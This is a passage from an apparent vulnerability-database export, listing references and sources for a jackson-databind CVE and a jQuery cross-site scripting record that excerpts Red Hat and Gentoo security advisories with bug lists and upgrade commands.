"url": "https://packetstormsecurity.com/files/159724/red-hat-security-advisory-2020-4366-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159083/red-hat-security-advisory-2020-3642-01.html"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/46078"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3065/"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-10672"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0210"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0205"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-10673"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-0210"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14887"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-1729"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-0205"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-14887"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10693"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-10693"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10719"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-10719"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-10172"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-17573"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1745"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10688"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17573"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-7226"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/html-single/installation_guide/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10172"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10688"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-1757"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.3/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1729"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7226"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-12423"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12423"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14371"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-14371"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-1745"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1757"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1710"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10740"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14297"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10687"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10714"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14297"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14900"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.2/html-single/installation_guide/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10683"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10714"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10672"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10683"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.2/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10687"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14900"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14307"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10740"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14307"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-1710"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-10718"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10718"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1748"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-1748"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10673"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-10968"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-11619"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-7238"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-10969"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16335"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11112"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3875"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11113"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14832"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16943"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_build_of_thorntail/2.5/html/release_notes_for_thorntail_2.5/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9515"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2067"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3875"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12406"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9514"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9511"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12400"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9514"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12419"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17531"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16335"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10086"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14832"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17531"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14540"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17267"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10199"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=catrhoar.thorntail\u0026version=2.5.1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9511"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16942"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12406"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14892"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10201"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11620"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12419"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9512"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17267"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14893"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11111"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10199"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14893"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14888"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9512"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12400"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14892"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10086"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14540"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14820"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14820"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14888"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4366"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12781"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5267"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14380"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7943"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8184"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14334"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5217"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5216"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12781"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5267"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14061"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7663"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5217"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8161"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14380"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14062"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8184"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11619"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7238"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14195"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14195"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8161"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10968"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14334"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10969"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14061"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5216"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14062"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2512"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3637"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_single_sign-on/7.4/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=core.service.rhsso\u0026version=7.4"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10748"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11023"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11022"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1694"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10748"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1714"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2813"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1714"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11022"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1694"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3639"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2511"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2515"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3638"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-187673"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "158048"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "158282"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "PACKETSTORM",
"id": "158037"
},
{
"db": "PACKETSTORM",
"id": "158038"
},
{
"db": "PACKETSTORM",
"id": "159082"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-040"
},
{
"db": "NVD",
"id": "CVE-2020-9548"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-187673",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-9548",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157741",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159724",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158048",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159081",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158282",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159080",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158037",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158038",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159082",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202003-040",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-9548",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-03-02T00:00:00",
"db": "VULHUB",
"id": "VHN-187673",
"ident": null
},
{
"date": "2020-03-02T00:00:00",
"db": "VULMON",
"id": "CVE-2020-9548",
"ident": null
},
{
"date": "2020-05-18T16:42:53",
"db": "PACKETSTORM",
"id": "157741",
"ident": null
},
{
"date": "2020-10-27T16:58:42",
"db": "PACKETSTORM",
"id": "159724",
"ident": null
},
{
"date": "2020-06-11T16:36:20",
"db": "PACKETSTORM",
"id": "158048",
"ident": null
},
{
"date": "2020-09-07T16:38:23",
"db": "PACKETSTORM",
"id": "159081",
"ident": null
},
{
"date": "2020-07-02T15:43:25",
"db": "PACKETSTORM",
"id": "158282",
"ident": null
},
{
"date": "2020-09-07T16:37:51",
"db": "PACKETSTORM",
"id": "159080",
"ident": null
},
{
"date": "2020-06-11T16:34:17",
"db": "PACKETSTORM",
"id": "158037",
"ident": null
},
{
"date": "2020-06-11T16:34:25",
"db": "PACKETSTORM",
"id": "158038",
"ident": null
},
{
"date": "2020-09-07T16:39:28",
"db": "PACKETSTORM",
"id": "159082",
"ident": null
},
{
"date": "2020-03-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-040",
"ident": null
},
{
"date": "2020-03-02T04:15:11.077000",
"db": "NVD",
"id": "CVE-2020-9548",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-12-02T00:00:00",
"db": "VULHUB",
"id": "VHN-187673",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-9548",
"ident": null
},
{
"date": "2022-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-040",
"ident": null
},
{
"date": "2024-11-21T05:40:50.670000",
"db": "NVD",
"id": "CVE-2020-9548",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "159081"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "PACKETSTORM",
"id": "159082"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-040"
}
],
"trust": 1.0
},
"title": {
"_id": null,
"data": "FasterXML jackson-databind Code problem vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-040"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-040"
}
],
"trust": 0.6
}
}
VAR-202004-2191
Vulnerability from variot - Updated: 2026-03-09 21:54In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. 8) - aarch64, noarch, ppc64le, s390x, x86_64
- Description:
The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.3 Release Notes linked from the References section. Bugs fixed (https://bugzilla.redhat.com/):
1376706 - restore SerialNumber tag in caManualRenewal xml 1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests 1406505 - KRA ECC installation failed with shared tomcat 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip 1666907 - CC: Enable AIA OCSP cert checking for entire cert chain 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1695901 - CVE-2019-10179 pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1706521 - CA - SubjectAltNameExtInput does not display text fields to the enrollment page 1710171 - CVE-2019-10146 pki-core: Reflected XSS in 'path length' constraint field in CA's Agent page 1721684 - Rebase pki-servlet-engine to 9.0.30 1724433 - caTransportCert.cfg contains MD2/MD5withRSA as signingAlgsAllowed. 1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA 1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. 1777579 - CVE-2020-1721 pki-core: KRA vulnerable to reflected XSS via the getPk12 page 1805541 - [RFE] CA Certificate Transparency with Embedded Signed Certificate Time stamp 1817247 - Upgrade to 10.8.3 breaks PKI Tomcat Server 1821851 - [RFE] Provide SSLEngine via JSSProvider for use with PKI 1822246 - JSS - NativeProxy never calls releaseNativeResources - Memory Leak 1824939 - JSS: add RSA PSS support - RHEL 8.3 1824948 - add RSA PSS support - RHEL 8.3 1825998 - CertificatePoliciesExtDefault MAX_NUM_POLICIES hardcoded limit 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1842734 - CVE-2019-10179 pki-core: pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab [rhel-8] 1842736 - CVE-2019-10146 pki-core: Reflected Cross-Site Scripting in 'path length' constraint field in CA's Agent page [rhel-8] 1843537 - Able to Perform PKI CLI operations like cert request and approval without nssdb password 1845447 - pkispawn fails in FIPS mode: AJP connector has secretRequired="true" but no secret 1850004 - CVE-2020-11023 jquery: Passing HTML containing elements to manipulation methods could result in untrusted code execution 1854043 - /usr/bin/PrettyPrintCert is failing with a ClassNotFoundException 1854959 - ca-profile-add with Netscape extensions nsCertSSLClient and nsCertEmail in the profile gets stuck in processing 1855273 - CVE-2020-15720 pki: Dogtag's python client does not validate certificates 1855319 - Not able to launch pkiconsole 1856368 - kra-key-generate request is failing 1857933 - CA Installation is failing with ncipher v12.30 HSM 1861911 - pki cli ca-cert-request-approve hangs over crmf request from client-cert-request 1869893 - Common certificates are missing in CS.cfg on shared PKI instance 1871064 - replica install failing during pki-ca component configuration 1873235 - pki ca-user-cert-add with secure port failed with 'SSL_ERROR_INAPPROPRIATE_FALLBACK_ALERT'
- You can also manage user accounts for web applications, mobile applications, and RESTful web services. Description:
Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Description:
Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments. Bugs fixed (https://bugzilla.redhat.com/):
1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests 1430365 - [RFE] Host-group names command rename 1488732 - fake_mname in named.conf is no longer effective 1585020 - Enable compat tree to provide information about AD users and groups on trust agents 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip 1651577 - [WebUI] IPA Error 3007: RequirmentError" while adding members in "User ID overrides" tab 1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute 1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1701233 - [RFE] support setting supported signature methods on the token 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1746830 - Memory leak during search of idview overrides 1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch 1751295 - When sync-repl is enabled, slapi-nis can deadlock during retrochanglog trimming 1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn't work in GUI (it works only from CLI) 1759888 - Rebase OpenDNSSEC to 2.1 1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED 1777806 - When Service weight is set as 0 for server in IPA location "IPA Error 903: InternalError" is displayed 1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service 1801698 - [RFE] Changing default hostgroup is too easy 1802471 - SELinux policy for ipa-custodia 1809835 - RFE: ipa group-add-member: number of failed should also be emphasized 1810154 - RFE: ipa-backup should compare locally and globally installed server roles 1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time 1813330 - ipa-restore does not restart httpd 1816784 - KRA install fails if all KRA members are Hidden Replicas 1818765 - [Rebase] Rebase ipa to 4.8.6+ 1818877 - [Rebase] Rebase to softhsm 2.6.0+ 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1831732 - AVC avc: denied { dac_override } for comm="ods-enforcerd 1831935 - AD authentication with IdM against SQL Server 1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11 1833266 - [dirsrv] set 'nsslapd-enable-upgrade-hash: off' as this raises warnings 1834264 - BIND rebase: rebuild against new so version 1834909 - softhsm use-after-free on process exit 1845211 - Rebase bind-dyndb-ldap to 11.3 1845537 - IPA bind configuration issue 1845596 - ipa trust-add fails with 'Fetching domains from trusted forest failed' 1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts 1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7 1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn 1849914 - FreeIPA - Utilize 256-bit AJP connector passwords 1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition 1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2 1853263 - ipa-selinux package missing 1857157 - replica install failing with avc denial for custodia component 1858318 - AttributeError: module 'ssl' has no attribute 'SSLCertVerificationError' when upgrading ca-less ipa master 1859213 - AVC denial during ipa-adtrust-install --add-agents 1863079 - ipa-epn command displays 'exception: ConnectionRefusedError: [Errno 111] Connection refused' 1863616 - CA-less install does not set required permissions on KDC certificate 1866291 - EPN: enhance input validation 1866938 - ipa-epn fails to retrieve user data if some user attributes are not present 1868432 - Unhandled Python exception in '/usr/libexec/ipa/ipa-pki-retrieve-key' 1869311 - ipa trust-add fails with 'Fetching domains from trusted forest failed' 1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less 1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain 1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin. 1879604 - pkispawn logs files are empty
-
Gentoo Linux Security Advisory GLSA 202007-03
https://security.gentoo.org/ <https://security.gentoo.org/>
Severity: Normal Title: Cacti: Multiple vulnerabilities Date: July 26, 2020 Bugs: #728678, #732522 ID: 202007-03
Synopsis
Multiple vulnerabilities have been found in Cacti, the worst of which could result in the arbitrary execution of code.
Background
Cacti is a complete frontend to rrdtool.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-analyzer/cacti < 1.2.13 >= 1.2.13 2 net-analyzer/cacti-spine < 1.2.13 >= 1.2.13 ------------------------------------------------------------------- 2 affected packages
Description
Multiple vulnerabilities have been discovered in Cacti. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All Cacti users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/cacti-1.2.13"
All Cacti Spine users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=net-analyzer/cacti-spine-1.2.13"
References
